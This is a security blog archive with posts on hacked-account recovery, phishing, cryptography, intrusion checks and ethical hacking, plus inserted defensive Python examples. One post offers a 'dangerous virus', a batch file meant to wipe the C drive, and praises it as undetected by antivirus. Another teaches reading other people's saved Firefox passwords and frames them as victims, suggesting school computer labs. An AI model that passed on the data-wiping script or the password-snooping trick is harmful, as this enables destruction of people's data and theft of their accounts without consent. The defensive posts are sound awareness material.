
Wednesday, 12 February 2014

What to Do After Your Email Account Gets Hacked


Learn what steps you should take if your email address gets hacked.
  • Change the password: The first line of defence against hackers is a solid password. Turns out, mine was pretty lame. Here are a few tips on how to pick a good one so this doesn't happen to you.
  • Check your other accounts: I know that sometimes it's easy to remember just one password, but if you've used the same password on multiple accounts (say Facebook, Twitter, and heaven forbid, your bank account) then you'll want to change those as well as soon as possible.
  • Delete old accounts: Although it may be fun to sign into the MySpace profile you haven't used in six months, go ahead and dump it — it's just begging to get hacked. Use a few of these handy websites that will help you find old profiles and accounts you may have forgotten about to keep your hacker liability low.
  • Send an apology: Even if you haven't corresponded with the poor people you've spammed in months (or years!), sending a mass email (at the least) will help smooth things over. No one likes finding spam in their inbox, especially when it's from an old friend.
  • Pay it forward: It's embarrassing enough finding out that you've been unknowingly spamming your friends and colleagues, so if you ever get spam from a friend, contact them immediately to help them minimize the damage.

How to Protect Your Twitter Account From Hackings


Follow these four steps to protect your Twitter account from falling victim to hackers.
  • Don't click on links from strangers — Unfortunately stranger danger is alive and well on the Internet in the form of weird direct messages or tweet replies that direct you to look at a picture of "OMG, is this your new tattoo?!" It's not. Don't click. If an actual Twitter friend sends a message that's a bit off, verify on another platform — SMS or email — if they meant to send the tweet. Chances are their account was hacked, or maybe they just needed to be gently told that they sort of tweet like a spammer.
  • Avoid phishing attempts — When signing into Twitter, check that you're on a secure and official log-in page by looking for a URL beginning with "https://" which denotes a safe connection to input username and password.
Read on for password safety tips and how to interact with third-party apps.
  • Create unique passwords across accounts — Having a complicated password won't help much when the same one is used across multiple sites. Once hackers get into one account, it's that much easier for them to use the same information and request a password reset of email or Facebook accounts. Use a different password for each web-based account.
  • Use third-party apps with caution — In your Twitter account settings, head over to Apps to see which services were previously given permission to integrate with your Twitter account. Revoke access to any you don't use often, or those that actually ask for your password.
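
The "secure and official log-in page" tip above can be turned into a small check. This is an added example, not part of the original post; the function name and the list of official hosts are assumptions, and the sample URLs are constructed.

```python
from urllib.parse import urlsplit

# Assumption: the hosts that serve the real log-in page. Adjust the set to the
# service you are checking; it is not taken from the original post.
OFFICIAL_LOGIN_HOSTS = {"twitter.com", "mobile.twitter.com"}


def check_login_url(url, official_hosts=OFFICIAL_LOGIN_HOSTS):
    """Return a list of problems; an empty list means the URL passed."""
    try:
        parts = urlsplit(url.strip())
        host = (parts.hostname or "").rstrip(".")
        has_userinfo = parts.username is not None or parts.password is not None
    except ValueError:
        return ["URL cannot be parsed"]

    problems = []
    if parts.scheme.lower() != "https":
        problems.append("scheme is not https")
    # In "https://twitter.com@login.example/" the browser connects to
    # login.example: everything before "@" is user info, not the site name.
    if has_userinfo:
        problems.append("URL contains user info before '@'")
    # Non-ASCII or punycode labels can be rendered to look like the real name.
    labels = host.split(".")
    if not host.isascii() or any(label.startswith("xn--") for label in labels):
        problems.append("hostname uses non-ASCII or punycode labels")
    # Exact match only: "twitter.com.login.example" merely starts with the name.
    if host not in official_hosts:
        problems.append("hostname %r is not an official log-in host" % host)
    return problems


# Constructed sample URLs (not real observations).
CONSTRUCTED_SAMPLES = [
    "https://twitter.com/login",
    "http://twitter.com/login",
    "https://twitter.com@login.example/session",
    "https://twitter.com.login.example/",
    "https://tw\u0456tter.com/login",  # Cyrillic letter in place of "i"
]

if __name__ == "__main__":
    for sample in CONSTRUCTED_SAMPLES:
        print(sample, "->", check_login_url(sample) or "passes")
```

A URL that passes has only cleared the two things the tip asks for: an https:// scheme and the official host name.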

Friday, 27 December 2013

Learn To Make Dangerous Virus In A Minute


In this post I will teach you to make a simple yet very powerful, or you can say harmful, computer virus using a batch file. No software is required to make this virus; Notepad is enough for it. The good thing about this virus is that it is not detected by any antivirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How To Hack Saved Password In Firefox ?

In this post I will share with you how to view saved passwords in the Mozilla Firefox web browser. This trick can be helpful if you get your hands on someone's computer, maybe your friend's, and he has saved passwords for certain websites like Gmail, Facebook, Yahoo etc.; then you can easily view his passwords with the very simple and easy trick that I am going to share today.

For demonstration purposes I have already saved a fake email and password for Facebook. But it will work on any website. So let's get started.

How to do ?

1. Open Firefox Web browser
2. Then click on Firefox > Option > Option as shown in the picture below.
3. A pop-up box will appear. In it, go to Security and click on Show Passwords as shown below.
4. Now click on the website whose password you want to see and click on Show Password as shown in the image below. (Note: It will ask for confirmation, so click Yes when the dialog box appears.)

5. Done. You have hacked the password of your victim in a few simple steps. You can try this at a school computer lab if someone has saved their password.

How To Open Banned Websites WIth Proxy Sites ?


There are many sites which are blocked by governments for breaking the laws of their country. Users download a lot of software to open these sites but end up being infected by malware and viruses. Today I will share a trick which can help you easily open these banned sites without downloading anything. As you know, there are many online proxies, but everyone needs a proxy server which is fast and trusted. In this post I am revealing an online proxy which is trusted and fast, and a tutorial to open banned sites with the help of such online proxies. Just follow my steps to open banned sites.

How To Open Banned Site ?

1. Open www.incloak.com in your browser.
You can also use any proxy site from list below
2. After that enter the URL of the site which you want to open like below.
3. Now click the Hide Me button and enjoy.

Saturday, 30 November 2013

Cryptography


By definition cryptography is the process of converting recognizable data into an encrypted code for transmitting it over a network (either trusted or untrusted). Data is encrypted at the source, i.e. sender's end and decrypted at the destination, i.e. receiver's end.

In all cases, the initial unencrypted data is referred to as plain text. It is encrypted into cipher text, which will in turn (usually) be decrypted into usable plaintext using different encryption algorithms.

                       Plaintext => Encryption => Ciphertext => Decryption => Plaintext

The Purpose :-
* Authentication : The process of proving one's identity.
* Privacy/confidentiality : Ensuring that no one can read the message except the intended receiver.
* Integrity : Assuring the receiver that the received message has not been altered in any way from the original.
* Non-repudiation : A mechanism to prove that the sender really sent this message.

In general cryptographic algorithms are classified into three categories as follows :

1) Secret Key Cryptography (SKC) : Uses a single key for both encryption and decryption.
2) Public Key Cryptography (PKC) : Uses one key for encryption and another for decryption.
3) Hash Functions : Uses a mathematical transformation to irreversibly "encrypt" information.

Secret Key Cryptography :- 
With secret key cryptography, a single key is used for both encryption and decryption. Because a single key is used for both functions, secret key cryptography is also called symmetric encryption.

Secret key cryptography algorithms that are in use today include :

1) Data Encryption Standard (DES) : DES is a block-cipher employing a 56-bit key that operates on 64-bit blocks. DES uses a key of only 56 bits, and thus it is now susceptible to "brute force" attacks.
Triple-DES (3DES) and DESX are the two important variants that strengthen DES.

2) Advanced Encryption Standard (AES) : The algorithm can use a variable block length and key length; the latest specification allowed any combination of key lengths of 128, 192, or 256 bits and blocks of length 128, 192, or 256 bits.

3) International Data Encryption Algorithm (IDEA) : Secret-key cryptosystem written by Xuejia Lai and James Massey, in 1992 and patented by Ascom; a 64-bit SKC block cipher using a 128-bit key. Also available internationally.

4) Rivest Ciphers : Named for Ron Rivest, a series of SKC algorithms.

RC1 : Designed on paper but never implemented.
RC2 : A 64-bit block cipher using variable-sized keys designed to replace DES. Its code has not been made public although many companies have licensed RC2 for use in their products. Described in RFC 2268.
RC3 : Found to be breakable during development.
RC4 : A stream cipher using variable-sized keys; it is widely used in commercial cryptography products, although it can only be exported using keys that are 40 bits or less in length.
RC5 : A block-cipher supporting a variety of block sizes, key sizes, and number of encryption passes over the data. Described in RFC 2040.
RC6 : An improvement over RC5, RC6 was one of the AES Round 2 algorithms.

5) Blowfish : A symmetric 64-bit block cipher invented by Bruce Schneier; optimized for 32-bit processors with large data caches, it is significantly faster than DES on a Pentium/PowerPC-class machine. Key lengths can vary from 32 to 448 bits in length. Blowfish, available freely and intended as a substitute for DES or IDEA, is in use in over 80 products.

Public-Key Cryptography :- 
Generic PKC employs two keys that are mathematically related, although knowledge of one key does not allow someone to easily determine the other key. One key is used to encrypt the plaintext and the other key is used to decrypt the ciphertext. It does not matter which key is applied first, but both keys are required for the process to work. Because a pair of keys is required, this approach is also called asymmetric cryptography.
In PKC, one of the keys is designated the public key and may be advertised as widely as the owner wants. The other key is designated the private key and is never revealed to another party.

Public-key cryptography algorithms that are in use today for key exchange or digital signatures include :

1) RSA : One of the most popular encryption algorithms, invented in 1977 by three MIT scientists (Ronald Rivest, Adi Shamir, and Leonard Adleman).
The key-pair is derived from a very large number, n, that is the product of two prime numbers chosen according to special rules; these primes may be 100 or more digits in length each, yielding an n with roughly twice as many digits as the prime factors. The public key information includes n and a derivative of one of the factors of n; an attacker cannot determine the prime factors of n (and, therefore, the private key) from this information alone and that is what makes the RSA algorithm so secure.

Hash Functions :-
Hash functions, also called message digests and one-way encryption, are algorithms that, in some sense, use no key. Instead, a fixed-length hash value is computed based upon the plaintext that makes it impossible for either the contents or length of the plaintext to be recovered. Hash algorithms are typically used to provide a digital fingerprint of a file's contents, often used to ensure that the file has not been altered by an intruder or virus. Hash functions are also commonly employed by many operating systems to encrypt passwords. Hash functions, then, provide a measure of the integrity of a file.
Hash algorithms that are in common use today include:
1) Message Digest (MD) algorithms : A series of byte-oriented algorithms that produce a 128-bit hash value from an arbitrary-length message.
MD2 : Designed for systems with limited memory, such as smart cards.
MD4 : Developed by Rivest, similar to MD2 but designed specifically for fast processing in software.
MD5 : Also developed by Rivest in 1991 after potential weaknesses were reported in MD4; this scheme is similar to MD4 but is slower because more manipulation is made to the original data. It accepts a variable-length message from the user and converts it into a fixed 128-bit message digest value.
One interesting and important aspect of the MD5 hash function is that it is a one way algorithm. This means you can produce the 128-bit fingerprint if the data chunk is available to you. You cannot, however, generate the entire data if only the fingerprint of the data is known.

2) Secure Hash Algorithm (SHA) : Algorithm for NIST's Secure Hash Standard (SHS). SHA-1 produces a 160-bit hash value and was originally published as FIPS 180-1 and RFC 3174. FIPS 180-2 describes five algorithms in the SHS: SHA-1 plus SHA-224, SHA-256, SHA-384, and SHA-512 which can produce hash values that are 224, 256, 384, or 512 bits in length, respectively. SHA-224, -256, -384, and -512 are also described in RFC 4634.

3) RIPEMD : A series of message digests that initially came from the RIPE (RACE Integrity Primitives Evaluation) project. RIPEMD-160 was designed by Hans Dobbertin, Antoon Bosselaers, and Bart Preneel, and optimized for 32-bit processors to replace the then-current 128-bit hash functions. Other versions include RIPEMD-256, RIPEMD-320, and RIPEMD-128.

4) HAVAL (HAsh of VAriable Length) : Designed by Y. Zheng, J. Pieprzyk and J. Seberry, a hash algorithm with many levels of security. HAVAL can create hash values that are 128, 160, 192, 224, or 256 bits in length.

5) Whirlpool : A relatively new hash function, designed by V. Rijmen and P.S.L.M. Barreto. Whirlpool operates on messages less than 2^256 bits in length, and produces a message digest of 512 bits. The design of this hash function is very different than that of MD5 and SHA-1, making it immune to the same attacks as on those hashes.

6) Tiger : Designed by Ross Anderson and Eli Biham, Tiger is designed to be secure, run efficiently on 64-bit processors, and easily replace MD4, MD5, SHA and SHA-1 in other applications. Tiger/192 produces a 192-bit output and is compatible with 64-bit architectures; Tiger/128 and Tiger/160 produce the first 128 and 160 bits, respectively, to provide compatibility with the other hash functions.
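
The "digital fingerprint" use of hash functions described in this section, as an added example that is not part of the original post. It uses Python's standard hashlib; the function names and the file contents are constructed for illustration, and files are held in memory as bytes so the example runs without touching the disk.

```python
import hashlib
import hmac
import io


def digest_bits(data, algorithm):
    """Digest length in bits: fixed per algorithm, whatever the input size."""
    return hashlib.new(algorithm, data).digest_size * 8


def fingerprint(stream, algorithm="sha256", chunk_size=65536):
    """Hash a file-like object in chunks so large files need little memory."""
    h = hashlib.new(algorithm)
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        h.update(chunk)
    return h.hexdigest()


def build_manifest(files, algorithm="sha256"):
    """Record a baseline fingerprint for every file (name -> bytes)."""
    return {name: fingerprint(io.BytesIO(data), algorithm)
            for name, data in files.items()}


def verify(manifest, files, algorithm="sha256"):
    """Compare the current files against the baseline manifest."""
    report = {"unchanged": [], "altered": [], "missing": [], "unexpected": []}
    for name, expected in manifest.items():
        if name not in files:
            report["missing"].append(name)
            continue
        actual = fingerprint(io.BytesIO(files[name]), algorithm)
        same = hmac.compare_digest(actual, expected)
        report["unchanged" if same else "altered"].append(name)
    report["unexpected"] = sorted(set(files) - set(manifest))
    return report


# Constructed file contents (not real data).
BASELINE_FILES = {
    "hosts": b"127.0.0.1 localhost\n",
    "notes.txt": b"quarterly report\n",
    "tool.bin": bytes(range(256)) * 1000,
}
CURRENT_FILES = {
    "hosts": b"127.0.0.1 localhost\n203.0.113.9 bank.example\n",  # one line added
    "tool.bin": bytes(range(256)) * 1000,
    "dropper.tmp": b"\x00\x01\x02",
}

if __name__ == "__main__":
    for name in ("md5", "sha1", "sha256", "sha512"):
        print(name, digest_bits(b"a" * 1_000_000, name), "bits")
    print(verify(build_manifest(BASELINE_FILES), CURRENT_FILES))
```

The manifest itself has to be stored where an intruder cannot rewrite it, otherwise the altered file and its new fingerprint will simply match.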

Phishing Attacks


Here we explain phishing and how we can protect ourselves from it.

>>WHAT IS PHISHING:-

The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.

 


>>MOBILE PHISHING:

Phishing scams are not limited to the internet. Some phishers use the telephone to make requests for information. If you get a call from your banking institution asking for personal information, hang up and call your bank directly. Your bank will have your social security number and account information on file and should only ask you to verify a few digits.

Phishers also use names like iPhone, Apple, iTunes and more, by SMS.

EXAMPLE:-

>>Congratulations! Your mobile phone has won US$ 10 Million prize money. To claim your money, call this number XXXXXXXX, give your permanent address, pin number, account number or credit card number...

The phisher can ask like this; they want your personal information.

Some people reply to the phisher and can then become the phisher's target, so never reply to these types of messages or mail.

 


In a phishing attack, the attacker creates a situation wherein people believe that they are dealing with an authorized party, like their bank or another service provider. The attacker will ask the victim for sensitive information such as credit card information.



>>Phishing attacks generally target:

    * Bank information – e.g. VISA and PayPal accounts.
    * Username and password information.
    * Social Security numbers.
    * Information which can be used to retrieve forgotten or lost credentials.



>>Follow the tips below to protect yourself against these threats:

· Your bank will never ask you to divulge account information or passwords via email. Never give out this information, especially via email.

· Don’t open emails that come from untrusted sources.

· Don’t run files that you receive via email without making sure of their origin.

· Don’t click links in emails. If they come from a known source, type them in the browser’s address bar. If they come from an untrusted source, simply ignore them, as they could take you to a website designed to download malware onto your computer.

· Keep your computer protected. Install a security solution and keep it up-to-date.


>>Protect yourself from Phishing scams that could lead to identity theft. I cannot stress this enough. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Friendster.



The term Phishing comes from the analogy to "fishing". The phisher uses a bait to lure victims into giving out personal information like passwords and credit card numbers. The bait is typically an urgent plea from one of the victim's friends or trusted websites, asking for information to resolve some sort of problem with their account.


>>Anti-phishing software is a must for anyone that accesses the internet. Most of the internet service providers have some safety measures included as part of their online security software. Most web browsers also have add-ons that can detect most phishing scams. Unfortunately, these measures are not enough. Some of the more clever phishers have found ways to trick the anti-phishing software so you need to be cautious of suspicious emails and messages.

Friday, 29 November 2013

How To check | Stop | Secure that Your Computer Hacked or Not


Computer hackers can cause serious damage to your computer and to your personal information.

Hacking can mean a number of things, but computer hacking is basically when someone accesses your computer or its resources without your permission and, initially, perhaps without your knowledge. Computers can be hacked without leaving any evidence behind. As a home user, you can always find out if you have been hacked by black hat hackers, because the black hat hacker either wants to keep using your personal computer's resources or wants to harm the computer. The black hat can try to access your computer.

As I am a security researcher, it’s my duty to stop black hat hackers from their unethical work and also to inform people about all the activity of those persons. So here is a simple trick for checking whether your computer may have been hacked. Follow these steps and you can easily check whether your computer is hacked or not. There are lots of techniques to stop the black hat hacker; for my readers I am sharing some simple ones, so let’s start.
Technique # 01
Look for extra folders: right click on the hard drive and check how much of your hard drive is used. If your computer has been compromised by a hacker, you will see that space has been lost, which means that your PC may be being used for file sharing. Now check your folders and you will see some folders with a large size.
Technique # 02
Check the users. Go to the Control Panel and click on "Users." If any extra users have been added, your computer may be hacked; if some user's password has been changed, it confirms that your computer was hacked.

Technique # 03
Find out if your security has been turned off. Go to the Control Panel and look to see if the firewall is turned off sometimes or always, if your antivirus is on, and if Windows Update is off; if so, then your computer is hacked.
Technique # 04
Finally, run your antivirus and other software such as a spyware remover. If your computer is hacked, it will show a lot of spyware.

HOW TO STOP HACKERS

Finally, some techniques for stopping hackers from this activity.
STEP # 01
Open your command prompt and type netstat -b. It shows you the IP addresses associated with all the programs engaged with the internet. The list will update every five seconds, giving you a real-time look at the IP addresses your computer is sending information to. Look for IP addresses or program names that you cannot identify. Take a screenshot and save it on your computer.
STEP # 02
Then type "tracert" followed by the IP address; it gives you information about the IP address, such as its name and internet service provider.
STEP # 03
Finally, shut down the computer. Then contact the ISP, give them the IP address and alert them to the whole problem, so that they may take action.
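
Step 1 above, looking through netstat -b output for programs you cannot identify, can be done over saved output instead of a screenshot. This is an added example, not part of the original post; the sample output is constructed, and the function names and the list of known programs are assumptions.

```python
import re

# Constructed sample of "netstat -b" output (addresses are documentation ranges).
CONSTRUCTED_NETSTAT_B = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:49670        127.0.0.1:49671        ESTABLISHED
 [firefox.exe]
  TCP    192.168.1.10:49712     203.0.113.25:443       ESTABLISHED
 [firefox.exe]
  TCP    192.168.1.10:49750     198.51.100.77:6667     ESTABLISHED
 [svch0st.exe]
  TCP    192.168.1.10:49801     192.0.2.14:8080        ESTABLISHED
 Can not obtain ownership information
  UDP    0.0.0.0:5353           *:*
 [chrome.exe]
"""

# Assumption: the programs this user expects to talk to the network.
KNOWN_PROGRAMS = {"firefox.exe", "chrome.exe", "svchost.exe"}

CONN_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")
OWNER_RE = re.compile(r"^\s*\[(.+)\]\s*$")
LOCAL_HOSTS = {"*", "0.0.0.0", "127.0.0.1", "::", "::1", "localhost"}


def parse_netstat_b(text):
    """Pair every connection line with the [program] line that follows it."""
    connections, current = [], None
    for line in text.splitlines():
        conn = CONN_RE.match(line)
        if conn:
            current = {"proto": conn.group(1), "local": conn.group(2),
                       "remote": conn.group(3), "state": conn.group(4) or "",
                       "program": None}
            connections.append(current)
            continue
        owner = OWNER_RE.match(line)
        if owner and current is not None and current["program"] is None:
            current["program"] = owner.group(1)
    return connections


def find_unrecognized(connections, known_programs=KNOWN_PROGRAMS):
    """Connections to another machine whose owner is unknown or not expected."""
    known = {name.lower() for name in known_programs}
    flagged = []
    for conn in connections:
        remote_host = conn["remote"].rsplit(":", 1)[0].strip("[]")
        if remote_host in LOCAL_HOSTS:
            continue  # loopback or listening socket, nothing leaves the machine
        program = conn["program"]
        if program is None or program.lower() not in known:
            flagged.append(conn)
    return flagged


if __name__ == "__main__":
    for conn in find_unrecognized(parse_netstat_b(CONSTRUCTED_NETSTAT_B)):
        print(conn["program"] or "<owner unknown>", "->", conn["remote"])
```

To use it on a real machine, run netstat -b from an elevated command prompt, redirect the output to a file, and pass the file's text to parse_netstat_b.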

How to check If A Website Is Reliable or Not



It is a matter of interest for the common man which websites are reliable and which should be dealt with from a distance. It becomes even more sensitive when it comes to websites related to online shopping, best deals, online money making, jobs and discount offers too good to be true. No doubt one must not label a site unreliable, a scam or fraudulent just by viewing it; however, there are certain ways one can, most of the time, tell whether a site is safe to visit or unreliable.


Along with shopping sites, there are also a few sites which don’t give you the accurate information you want; for example, you search for something and are redirected to another website just because of related keywords.

There are many sites which have fake content and fake or copied meta descriptions, or you can say keywords, just to redirect traffic. While analyzing this issue for others as well as myself, I have gathered a list of tips to stay secure from these websites and save money and time.

Here, I am listing a few helpful tips for you to use while judging the reliability of a website.

1.    Web of Trust (WOT)

This is an easy to handle tool and comes in handy for judging the reliability of a website. Admin of the tool gathers feedback from users all over the world and keeps a good record. Users can download a WOT extension for the browser they use like Google Chrome, Firefox or Internet Explorer. The tool is highly integrated into the browser and is very quick to give information about the website as soon you get the search results.

You can easily download extension for your browser by visiting http://mywot.com and start using this.

I want to show a snapshot for better elaboration that how this extension helps you judging the reliability of a website.

*      When there is Green the site is totally reliable.        
*      Yellow indicates a spam or doubtful site.
*      Red is a scam site, you must not rely on.
*      A question mark says the site has not been rated; you can play your role here.


So this tool can be helpful, and at any time you can check whether a site is reliable and whether you should deal with it. I must tell you one thing from my personal experience: WOT is reliable and accurate most of the time, but when it comes to new sites where there have not been many votes by users and the reliability of the site is not well established, the information provided by WOT can be compromised.

2.    Site Design

This point of common sense states that a reliable, trustworthy site will mostly have a smooth, clean and clutter-free design, and a site with lots of mess and inappropriate formatting is definitely telling you to stay at a distance. There are many PPC sites available on the Internet, but most of them are scams and just 35% of the websites are truly paying. People judge on the basis of a site's structure, but that isn’t all, because this can be done for any blog or website. Try to check for a structure which shows uniqueness.

3.    Admins and Authors

A site which is rooted back to a well-known organization, established admin and mentioned authors is usually reliable as compared to a site which is managed anonymously. It is possible that a site which is maintained anonymously is at the same time not a scam or spam and reliable but most of the times if a site is managed by anonymous admin and much of the information is not mentioned there is something fishy and you must stay out of the scene in such cases.

4.    Alexa Ranking

Alexa ranking is another useful criterion for judging the reliability of a website. Alexa is owned by Amazon, and they rank all websites based upon multiple factors; the ranking is very important for knowing whether a website is trustworthy. Alexa ranks a blog/website on the basis of the impressions/traffic it gains in a particular time, so it is a better way to check whether the website is reliable, and it also indicates the sites to which the current site is linked.

There are other rankings that serve the purpose, but Alexa leads the rest. They monitor everything, including traffic. The principle for using Alexa ranking is: the lesser the better.

5.    Google Page Rank

Page Rank is another good criterion for you to check whether a site is trustworthy or not. This is something totally different from Alexa ranking. It is a ranking from 0 to 10, the higher the better. However, don’t make such decisions on the basis of Page Rank alone, because there are many hidden tricks through which a webmaster can easily raise their Page Rank from 0 to 1, 0 to 5 and further; so don't rely directly on a Page Rank checker, but also go through the other steps discussed above.

Tuesday, 5 November 2013

Internet Security and Ethical Hacking


Welcome to the unique confluence of hackers , crackers and security professionals
on the world wide web. This is your complete resource for internet security and ethical hacking.

The Ethical Hacker :- Most people think that hackers are computer criminals. They fail to recognise the fact that criminals and hackers are two totally different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who, by using their knowledge in a constructive manner, help organisations, companies, government, etc. to secure documents and secret information on the internet.


An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing and red teaming. An ethical hacker is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.
One of the first examples of ethical hackers at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
In order for hacking to be deemed ethical, the hacker must obey the below rules.
  1. You have permission to probe the network and attempt to identify potential security risks. It's recommended that if you are the person performing the tests that you get written consent.
  2. You respect the individual's or company's privacy and only go looking for security issues.
  3. You report all security vulnerabilities you detect to the company, not leaving anything open for you or someone else to come in at a later time.
  4. You let the software developer or hardware manufacturer know of any security vulnerabilities you locate in their software or hardware if not already known by the company.
The term "ethical hacker" has received criticism at times from people who say that there is no such thing as an "ethical" hacker. Hacking is hacking, no matter how you look at it and those who do the hacking are commonly referred to as computer criminals. However, the work that ethical hackers do for organizations has helped improve system security and can be said to be quite successful. Individuals interested in becoming an ethical hacker can work towards a certification to become a Certified Ethical Hacker. This certification is provided by the International Council of E-Commerce Consultants (EC-Council). The exam itself costs about $500 to take and consists of 125 multiple-choice questions in version 8 of the test (version 7 consisted of 150 multiple-choice questions).